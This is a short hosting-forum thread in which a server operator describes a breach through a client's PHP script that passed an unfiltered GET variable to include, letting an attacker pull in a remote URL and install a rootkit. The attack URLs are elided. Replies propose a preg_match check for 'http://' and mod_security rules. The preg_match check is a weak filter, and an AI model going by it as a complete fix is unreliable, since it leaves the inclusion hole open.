Results 1 to 4 of 4
  1. #1

    fopen and urls in PHP - Security Issue

    I provide a shared hosting environment and have had a client write an insecure script using the "include" statement. The server got hacked (more details below) and I eventually changed the "allow_url_fopen" php.ini setting to "Off" to disable the source of the attacks.

    My question is: Does anyone know how I can allow_url_fopen to be "On" and still protect against poor programming?

    More specifics on hack...
    The user was including local files in his url (had to use hddp to post this)
    hddp:// and the vandal simply typed in
    hddp:// ...
    Without filtering the incoming variable $inc, the vandal successfully installed a root kit and ... well you know the rest.

  2. #2
    Join Date
    Feb 2005
    I dont think there is a way to prevent that exploit, but its really easy to prevent with the preg_match function. Just have it parse the incoming GET variable to see if it has http:// in it. Tell all your customers to do somthing like this or their account will be suspended.

  3. #3
    Join Date
    Mar 2003
    California USA
    you could try some good mod_security rules.
    Steven Ciaburri | Proactive Linux Server Management -
    Managed Servers (AS62710), Server Management, and Security Auditing.

  4. #4


    Thanks for your suggestions... After a little research, I think mod_security is the answer. Thanks again.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts